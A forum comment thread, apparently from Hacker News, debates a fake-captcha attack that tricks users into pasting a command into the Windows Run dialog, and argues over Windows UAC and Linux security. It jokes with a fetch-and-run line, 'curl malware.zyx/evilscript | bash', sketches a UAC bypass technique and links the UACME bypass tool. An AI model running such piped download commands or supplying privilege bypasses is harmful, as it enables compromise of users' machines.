"I could see junior developers falling for this" - I can see all sorts fucking up, not just juniors. It is the way of things.

"I don't think that...". I think that you have to train your troops effectively in what is harmfull.

"Windows" - yes. I have been asked by at least two of my employees to get them away from Windows. I'll do my best. Its been a long running project but I will succeed.

> Problem number 3, Windows still let you root a machine by 1 line in powershell? What the @$$%&%&#$?

sigh It needs to be run under an account with admin privileges for that. The shield on the "Run" dialog screenshot clearly indicates what it was taken under a user with admin privileges and UAC disabled.

Come on, now cry what Linux still let you root a machine by 1 line in curl malware.zyx/evilscript | bash.

> … by 1 like in curl malware.zyx/evilscript | bash.

Making the script POSIX compliant would allow hacking computers without bash. Then you can pipe it into just “sh” which is guaranteed to be on the PATH.

> it was taken under a user with admin privileges and UAC disabled.

you will have to accept that users either ask this UAC to be turned off, or it gets turned off by the original installer of the windows for the user (presumably non-technical user).

It's like telling traffic accident sufferers that they should've put on a seatbelt. True, but pointless.

> you will have to accept that users either ask this UAC to be turned off

Running with UAC disabled under an admin account?

That's not only a lack of a seatbelt, but wearing a flip-flops too.

And I'm eating my dogfood too, I'm running under a regular user since migrated from Vista, both on personal and work devices. Sometimes it's PITA, sure, but it's manageable.

>Come on, now cry what Linux still let you root a machine by 1 line in curl malware.zyx/evilscript | bash.

Excuse me, but some of us prefer to let evil scripts root our machines via pure sh, thank you very much.

Glad I’m not the only one thinking about POSIX compliance!

I've started disabling the Run dialog for non-technical users, but unfortunately a GitHub attack targets users who likely have a real use for it sometimes.

The clipboard strategy feels like it should be easy to block too, most scammers just convince people to type a well-obscured URL into the Run dialog manually over the phone.

> The clipboard strategy feels like it should be easy to block too

yea, the browser should actually have each site ask for permission to modify the clipboard imho.

That might add another step but I think it is unlikely to help reduce the number of victims. If someone is willing to bring up the run prompt and paste whatever they have in the clipboard they are also likely to be social engineered into clicking yes on a dialog that tells them to allow clipboard modification.

This captcha is so bad... I'm gonna automate the solving of this captcha so whenever my browser shows me "Press Win+R, CTRL+V <enter>", it automatically runs cmd.exe with the clipboard content so I can get to the site content faster and with no interruption.

Yes, I'm a 10X Windows user.

>>Windows still let you root a machine by 1 line in powershell? What the @$$%&%&#$?

> We can do whatever we want with the computer we own and use.

There is a difference between what an owner of a computer can and should be able to do, verses what an arbitrary actor can do to a computer they do not own through subterfuge. It is the responsibility of an Operating System to facilitate the former and guard against the latter.

MS Windows has a poor history of being able to do either.

Remember the old saying: With great power comes great responsibility.

Windows just lets us do anything and everything, and it's up to us how we want to secure it if at all.

Every other operating system family tries to realize security by straight up locking the user, the administrator, out of his own computer. They still get compromised, by the way.

Windows has absolutely succeeded and continues to succeed in enabling the user, including security if he so desires. This is the reason Windows became the dominant desktop OS. The others? Nope on both counts. The Linux world in particular always screams about user freedom, yet ironically it's Windows and its community that actually makes that freedom a reality.

Once more: I hope to god this never changes.

This is a wild take. Would you mind expanding a bit on the oppressive, locked down ecosystem that’s choking the free expression of Linux users?

For starters it's security theater, given everyone and their dog prefixes sudo to all commands without much thinking. There are also some who just smash in sudo -i as the first thing they ever do upon boot (guilty as charged) because they suffer RSI from typing sudo a trillion times.

There's also this impression that the operating system is just secure and you as the user are just protected like it's a law of physics. Spoiler alert, you are not and it's not a law of physics either. It's still your responsibility to secure the computer if you so desire and otherwise not do dumb shit like copypasta'ing commands from the internet.

I'm not even going to get into the politics that are package managers and repos, that's just straight bullshit that has more to do with human nature than computer science.

Speaking of politics, most of the FOSS community at large hates users using and administrators administering computers how they want. You must subscribe to the One Libre Way(tm) or you are a heathen doing it wrong. So much for freedom. The Windows community meanwhile is mostly composed of jaded engineers who are just happy to see others get stuff done and get through another day in one piece.

Windows from the start places the user at the controls with mostly no child safety locks in place (and you can remove what is there easily, eg: UAC), and with that power you have to accept that if you end up hosing the system the problem is you because Windows doesn't even pretend to really protect you.

Having the sheer power to hose Windows with a single Powershell line is what freedom is. Freedom is both delightful and horrifying.

> Windows from the start places the user at the controls

Would this be the same Windows that now requires TPM2, UEFI Secure Boot, a Microsoft account to log in, and a special boot mode to use drivers not signed by Microsoft?

What I am writing below I mean genuinely, without malice, and in the hope it helps dispel some of the conclusions you have expressed above, if not for Linux itself (which I do not normally use) then for other Unix operating systems such as FreeBSD[0].

> For starters it's security theater, given everyone and their dog prefixes sudo to all commands without much thinking.

Setting aside the hyperbole, such as "everyone and their dog prefixes sudo to all commands" and "most of the FOSS community at large hates users", user/group/other permissions are one part of security in depth. Excessive use of sudo is indicative of an improperly configured system or use of software which lacks understanding of the OS which runs it. Both are causes for concern.

> Windows from the start places the user at the controls with mostly no child safety locks in place ...

To continue your analogy, child safety locks exist to minimize avoidable catastrophic situations for those unable to do same.

> ... with that power you have to accept that if you end up hosing the system the problem is you because Windows doesn't even pretend to really protect you.

At first glance, this has a "victim blaming" flavour to it along the lines of "you should have known better." A more concerning implication is that this perspective does not take into consideration what happens when a blackhat attack is perpetrated.

What benefit is "the sheer power to hose Windows with a single Powershell line" when it is not you whom executes it?

0 - https://docs.freebsd.org/en/books/handbook/introduction/

You will have to excuse me for effectively ignoring the rest of your comment since what I'm about to point out more than makes up for the things you pointed out.

>What benefit is "the sheer power to hose Windows with a single Powershell line" when it is not you whom executes it?

The benefit is the sheer power to hose Windows with a single Powershell line.

In case that doesn't make sense, let me put it this way: The benefit is the power to do whatever you want with Windows.

Windows essentially will not say no to what you ask of it, you have the freedom to do with your computer as you desire with Windows. With this power, this freedom, this virtue comes responsibility. You as the user must secure the system as desired from the ground up, you have the power to do so and the responsibility.

Computers are tools, Windows enabling your ability to use your computer as a tool is a virtue that is priceless especially in this day and age.

If you don't believe me, consider that Windows brought forth the era of personal computing to the commons and continues to enable them by nurturing an ecosystem that can cater to almost all users' desires that now spans literally decades.

> >What benefit is "the sheer power to hose Windows with a single Powershell line" when it is not you whom executes it?

> The benefit is the sheer power to hose Windows with a single Powershell line.

> In case that doesn't make sense, let me put it this way: The benefit is the power to do whatever you want with Windows.

The point which I think I am failing to convey is not about limiting what a person whom owns a computer can do with it. Instead, it is that computers interacting with other computers can be introduced to code which is not "whatever you want with Windows", but instead "whatever someone else wants to do with your Windows."

In the case you presented above, nowhere is there consideration of malicious actors. Were this not a real concern, there would be no market for virus scanners (be they for Windows or other operating systems).

Here is an exercise to try out - replace first person tense in the text above with the equivalent of "someone other than me."

I truly don't understand your desire to remove Linux file permissions. I also don't get why you think it's difficult to do so. There are plenty of ways for you to enable yourself to hose your machine without having to enter a password.

> This is a virtue. We can do whatever we want with the computer we own and use.

You certainly don't need to do it with a single line of powershell though. At least, not without intentionally opting into it. For the most part on a daily basis I just want to use my computer, not modify it.

Anyway, at the very least most functionality should be sandboxed so that if someone does something without your consent, it can't do much damage. Though this wasn't the original intention, leveraging user privileges and sandboxing applications by user is an effective way to do this.

Besides what kind of moron would choose proprietary software if they wanted control of their machine? It's inherently a contradictory impulse.

> At least, not without intentionally opting into it.

just to clarify in Windows, users with administrative privileges will in theory still ask the user to opt-in every time before any process is elevated to administrative rights. Its just that Windows security is so awful that people have found many different creative ways around it over the years, but those are (sometimes) getting patched by Microsoft so they are considered "bugs".

For example a process stores its executable path in memory writable by itself, so you could start a process that replaces its executable string to "C:\Windows\explorer.exe" and it would (for whatever reason) bypass the "ask for administrative rights" dialog popup. This is the sort of "security" that Windows is built around to its very core.

https://github.com/hfiref0x/UACME

> "This tool shows ONLY popular UAC bypass method used by malware, and re-implement some of them in a different way improving original concepts. *There are different, not yet known to the general public, methods. Be aware of this;*"

(also i think you are responding to a troll btw)

>(also i think you are responding to a troll btw)

You would be wrong.

thats exactly what a troll would say though :p